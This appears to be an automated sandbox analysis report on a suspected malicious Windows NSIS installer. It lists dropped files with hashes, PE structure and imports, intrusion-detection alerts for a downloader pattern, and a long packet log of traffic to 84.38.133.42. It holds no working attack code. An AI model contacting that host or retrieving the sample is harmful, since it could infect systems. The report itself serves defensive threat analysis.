                                                Preview:d..fa........................................=.................-................................A:..:...............q........k.....................D...Y..........................rp......4................2......C......................<)3....................G.......P...z................e.....o...............N........r...................p.......`........m............. .....a...B3.........E.......1.......*...........................i....................s......5.......5.................h..+...................................'.....h....................o...................&.......................|....+.............t.........................@....H.].N.........9.....#.........x....................[...F...................c...............T....................+........9................h.....D....*.....................`.................................JS.......w..................;.........a...m..D.........................................;............................9-...p..............Va........
                                                Process:C:\Users\user\Desktop\u9aPQQIwhj.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):34164
                                                Entropy (8bit):2.280731480965403
                                                Encrypted:false
                                                SSDEEP:384:Hn4soqyBjp3VRJ8c1VeHzeF8mjExy8jaw5zjnyh+:Ys3aPJzeTeMxy8j15J
                                                MD5:091BC262A5D568D2DD2CE1C16934963B
                                                SHA1:58F0086F8C18C516BBBFC86BD9F1B6098E043019
                                                SHA-256:34B4DFD59AE76D70C89C05E2B7D42C5177C14912E5602F3488F14CB2BEC3AE15
                                                SHA-512:019ACBFCFCAF1645A2E365AAC15A15B60EFC1F144CB7C9A703413BAAD79B800037589C80326BE41B487AF8B22F532526301F561EDA67B0F4B7D007A9A4451EF6
                                                Malicious:false
                                                Preview:............r.........*.................................................k..........................|.C.................&.....................................3...........;........i>..[2....B.........B.....h.................V.............................................................0...x....<...(.............................................:............C.......q....................u..........................................................."..........g.....E..................................6..................................n......4...........O.....:..........B.O..............8......X........8...t........................... ..7.fJ#.....|..............)........................1...........X....(..........................4.............................>.c.........F..............\........t......;.................W.............;..................................3.........L..m.........<.......(.................i...........@...........+..............o.f.....{...............bW...........4..
                                                Process:C:\Users\user\Desktop\u9aPQQIwhj.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):400
                                                Entropy (8bit):4.340884176214527
                                                Encrypted:false
                                                SSDEEP:12:ABodXqUr8bKPlUsoyXqy6oHLrccOrMH2m:kaq+vUWqv08VMf
                                                MD5:71229AB517CA5DAC3316733FE5538924
                                                SHA1:0DB282ED1142AA8D850E0BEC60D502DF3A8D786B
                                                SHA-256:C7FB70336975F025E346E7B884A1641BDF4A9510315D059F1509A51249EDDD07
                                                SHA-512:77C36AFF187EC195EAF128B4696F54E18B297A9797922ECA97E3147EE9F49A0BA15ECB81BE7ED65C6D199D83EA8BC7823D30AACBA5B35351312EBAB25C658DDC
                                                Malicious:false
                                                Preview:retsmdes cakavci stykvrker terylene penumbrous cuprotungstite paleontology sukrings..extravasation kunstmaler naturvidenskabeliges pointer nabbers pasfotografi forholdende anesthaetically feberkramper..savvrk optimalvrdierne oversigterne.serpuloid astrobiological decimaltegn udefinerbar,acidophil gis bolvrks hretisk sprays sevald tamilske,makie adherant indsejling kassedamerne fluor pantochromism.
                                                Process:C:\Users\user\Desktop\u9aPQQIwhj.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):14243
                                                Entropy (8bit):2.3093269369302396
                                                Encrypted:false
                                                SSDEEP:192:ys2EB7EvpKyCMZFGrgNerrpDYvMo4E1+iI2tjx:ysfdCyGerrpUvxZ+7+t
                                                MD5:B6F7202B553B5DC0A1B7D7B141FE8A64
                                                SHA1:68B48ED6E05998B9F6E590510F74AD5677620EE7
                                                SHA-256:D1465221589C115AFA440E20E7E63E6E7D70B8DAE1CA87710A8FFD6D7D8EADC5
                                                SHA-512:4D7B9795444537247FF1851B0C557A1235E90DDDB49ABCDC64DBC9612BB2347D675734FAA6121D0875EF099B0C453A278C977463CE1D4453142CB19127244506
                                                Malicious:false
                                                Preview:....0.........................................(..........!.................+....................k..[............Z...............&....................$...................................;.........................................).................................;...................no.........N................k...........X..........g.....................R.........4.....h..e....................................>.....O...Q.....................r+......n..............x... .....B....................R...........................U..................................0......i....m............>................l.......[.....................................p.....................................u.....K.G...s...................3..................p..........v.......w....E......Cr.......................................................F.............m#...............].T.......................*.......j............................4a...............................n....r............b..............................
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.677867455857126
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:u9aPQQIwhj.exe
                                                File size:749'170 bytes
                                                MD5:8b6b09811835191f99d4e2e9d94d232c
                                                SHA1:08edbf7da5b2e827978e178e5e49b45b5169d87c
                                                SHA256:7bcd44c32c5d526659023b033c47e867068ae604484f85a21a4788cafe5b03e7
                                                SHA512:d271e1036f64725e9c713b43844363b7fbcc594ee95395b90ce7777b01a43385547446afbf7b778d1211e3e7780c36ba8143786aa0261b7a940ee63b0f0fd1df
                                                SSDEEP:12288:8tvD9kg2V9Lki65FEx3ppAYNHS1Hf1CNoLOaZ3HC5mCO:1XlP609XkBjn
                                                TLSH:91F4221E35E48436C96EBE371D7DD7A7F634BF2680A02D47328C7B1B692234E461426B
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....f.R.................`...*......X3.......p....@
                                                Icon Hash:86933931792d7578
                                                Entrypoint:0x403358
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                Time Stamp:0x52BA66B2 [Wed Dec 25 05:01:38 2013 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                                Instruction
                                                sub esp, 000002D4h
                                                push ebx
                                                push ebp
                                                push esi
                                                push edi
                                                push 00000020h
                                                xor ebp, ebp
                                                pop esi
                                                mov dword ptr [esp+14h], ebp
                                                mov dword ptr [esp+10h], 00409230h
                                                mov dword ptr [esp+1Ch], ebp
                                                call dword ptr [00407034h]
                                                push 00008001h
                                                call dword ptr [004070BCh]
                                                push ebp
                                                call dword ptr [004072ACh]
                                                push 00000008h
                                                mov dword ptr [00429298h], eax
                                                call 00007FAF007EF76Ch
                                                mov dword ptr [004291E4h], eax
                                                push ebp
                                                lea eax, dword ptr [esp+34h]
                                                push 000002B4h
                                                push eax
                                                push ebp
                                                push 00420690h
                                                call dword ptr [0040717Ch]
                                                push 0040937Ch
                                                push 004281E0h
                                                call 00007FAF007EF3D7h
                                                call dword ptr [00407134h]
                                                mov ebx, 00434000h
                                                push eax
                                                push ebx
                                                call 00007FAF007EF3C5h
                                                push ebp
                                                call dword ptr [0040710Ch]
                                                cmp word ptr [00434000h], 0022h
                                                mov dword ptr [004291E0h], eax
                                                mov eax, ebx
                                                jne 00007FAF007EC8BAh
                                                push 00000022h
                                                mov eax, 00434002h
                                                pop esi
                                                push esi
                                                push eax
                                                call 00007FAF007EEE16h
                                                push eax
                                                call dword ptr [00407240h]
                                                mov dword ptr [esp+18h], eax
                                                jmp 00007FAF007EC97Eh
                                                push 00000020h
                                                pop edx
                                                cmp cx, dx
                                                jne 00007FAF007EC8B9h
                                                inc eax
                                                inc eax
                                                cmp word ptr [eax], dx
                                                je 00007FAF007EC8ABh
                                                add word ptr [eax], 0000h
                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x540000x2d490.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x5e660x6000e8f12472e91b02deb619070e6ee7f1f4False0.6566569010416666data6.419409887460116IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x90000x202d80x600a5ec1b720d350c6303a7aba8d85072bfFalse0.4733072916666667data3.7600484096214832IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .ndata0x2a0000x2a0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x540000x2d4900x2d6003469fad129cc4f5d98277ff568dc0969False0.603391873278237data6.111326163907691IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x543580x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.376375251390039
                                                RT_ICON0x64b800xe444PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9933089191594223
                                                RT_ICON0x72fc80x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.4520794824399261
                                                RT_ICON0x784500x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.4557156353330184
                                                RT_ICON0x7c6780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5064315352697095
                                                RT_ICON0x7ec200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.551829268292683
                                                RT_ICON0x7fcc80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6086065573770492
                                                RT_ICON0x806500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6719858156028369
                                                RT_DIALOG0x80ab80x100dataEnglishUnited States0.5234375
                                                RT_DIALOG0x80bb80x11cdataEnglishUnited States0.6056338028169014
                                                RT_DIALOG0x80cd80xc4dataEnglishUnited States0.5918367346938775
                                                RT_DIALOG0x80da00x60dataEnglishUnited States0.7291666666666666
                                                RT_GROUP_ICON0x80e000x76dataEnglishUnited States0.7542372881355932
                                                RT_VERSION0x80e780x310dataEnglishUnited States0.4846938775510204
                                                RT_MANIFEST0x811880x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984
                                                DLLImport
                                                KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                                USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States
                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-10-31T11:44:20.063181+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.449730TCP
                                                2024-10-31T11:45:03.410315+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.462004TCP
                                                2024-10-31T11:45:28.117345+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.46211584.38.133.4280TCP
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 31, 2024 11:45:26.568109989 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:26.573050022 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:26.576407909 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:26.576579094 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:26.581507921 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.117253065 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.117310047 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.117345095 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.117352009 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.117362976 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.117386103 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.117407084 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.117433071 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.117435932 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.117469072 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.117477894 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.117496967 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.117528915 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.117542028 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.117569923 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.117579937 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.117613077 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.117620945 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.117645025 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.117655993 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.117685080 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.117906094 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.117948055 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.125927925 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.125981092 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.126018047 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.126065969 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.126120090 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.126153946 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.126168966 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.126202106 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.126591921 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.126641035 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.126641989 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.126674891 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.126693964 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.126710892 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.127579927 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.127614021 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.127630949 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.127649069 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.127655983 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.127693892 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.128422976 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.128468990 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.128473997 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.128506899 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.128515005 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.128552914 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.129301071 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.129333973 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.129349947 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.129369020 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.129384995 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.129415989 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.130139112 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.130187035 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.131136894 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.131182909 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.131417036 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.131465912 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.131592989 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.131639957 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.131819010 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.131869078 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.132100105 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.132145882 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.132481098 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.132529974 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.132780075 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.132828951 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.133126020 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.133173943 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.133294106 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.133337975 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.133531094 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.133577108 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.133903980 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.133954048 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.134140968 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.134187937 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.134407997 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.134449959 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.134773970 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.134819984 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.135000944 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.135049105 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.135343075 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.135389090 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.135603905 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.135668993 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.135993004 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.136039972 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.136111021 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.136157990 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.136305094 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.136352062 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.136396885 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.136436939 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.136457920 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.136504889 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.136689901 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.136738062 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.136789083 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.136822939 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.136837006 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.136868954 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.136995077 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.137038946 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.137200117 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.137250900 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.137415886 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.137449980 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.137473106 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.137490034 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.137710094 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.137757063 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.137864113 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.137912035 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.138238907 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.138273001 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.138286114 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.138308048 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.138319969 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.138341904 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.138351917 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.138386011 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.138411045 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.138443947 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.138454914 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.138485909 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.138866901 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.138900042 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.138914108 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.138945103 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.139122009 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.139154911 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.139168978 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.139200926 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.139311075 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.139369011 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.139377117 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.139422894 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.139720917 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.139754057 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.139765978 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.139799118 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.139926910 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.139975071 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.140005112 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.140050888 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.140301943 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.140347958 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.140423059 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.140470028 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.140489101 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.140537024 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.140609026 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.140654087 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.174846888 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.174891949 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.174911976 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.174926043 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.174940109 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.174958944 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.174967051 CET6211580192.168.2.484.38.133.42
